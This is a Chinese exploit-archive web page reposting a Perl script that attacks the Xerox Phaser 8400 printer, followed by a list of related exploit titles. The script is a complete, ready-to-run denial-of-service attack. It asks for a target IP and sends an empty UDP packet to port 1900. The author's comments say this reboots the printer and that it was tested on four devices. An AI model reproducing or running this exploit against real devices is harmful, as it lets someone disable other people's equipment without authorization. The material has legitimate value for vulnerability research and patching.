手机
当前位置:查字典教程网 >网络安全 >Exploit >Xerox Phaser 8400 (reboot) Remote Denial of Service Exploit
Xerox Phaser 8400 (reboot) Remote Denial of Service Exploit
摘要:#!/usr/bin/perl#carved-outby:crit3rion,justmakingth3worldab3tt3rplac3!...

#!/usr/bin/perl

# carved-out by: crit3rion, just making th3 world a b3tt3r plac3!

# Xerox_Remote_DoS.20080801.ver01 (tanx to dr0pz0N3 for reminding me to close my #$*&*! s0ck3t)

# Make: Xerox

# Model: Phaser 8400

# Firmware: 03/03/2004

#

# What's the deal?

# Apparently, if you send an empty packet to a Xerox Phaser 8400 printer

# the printer will reboot. Tested successfully on four printers.

#

# Let's not leave our maliciousness open to exploitation and errors!

use strict;

use warnings;

use IO::Socket::INET;

# What's your printer's IP Address?

print "Please enter the printers IP:n";

my $ipaddr = <STDIN>;

chomp $ipaddr;

# Let's setup the connection...

my $socket = IO::Socket::INET->new(

PeerPort => 1900,

PeerAddr => $ipaddr,

Proto => "udp" )

or die "I tried. Maybe you entered the wrong IP?n Maybe it's just my bad code...n In any case, check: $@nn";

# Okay... Let's kill it.

$socket->send("");

$socket->close();

print "Done. It should have died.nn";

exit(1);

【Xerox Phaser 8400 (reboot) Remote Denial of Service Exploit】相关文章:

ITechBids 7.0 Gold (XSS/SQL) Multiple Remote Vulnerabilities

Easy File Sharing FTP Server 2.0 (PASS) Remote Exploit

Yahoo Messenger 8.1 ActiveX Remote Denial of Service Exploit

AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection Vulnerability

Pluck 4.5.1 (blogpost) Local File Inclusion Vulnerability (win only)

BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit

Joomla Component DT Register Remote SQL injection Vulnerability

Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit

Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF Exploit

HockeySTATS Online 2.0 Multiple Remote SQL Injection Vulnerabilities

精品推荐
分类导航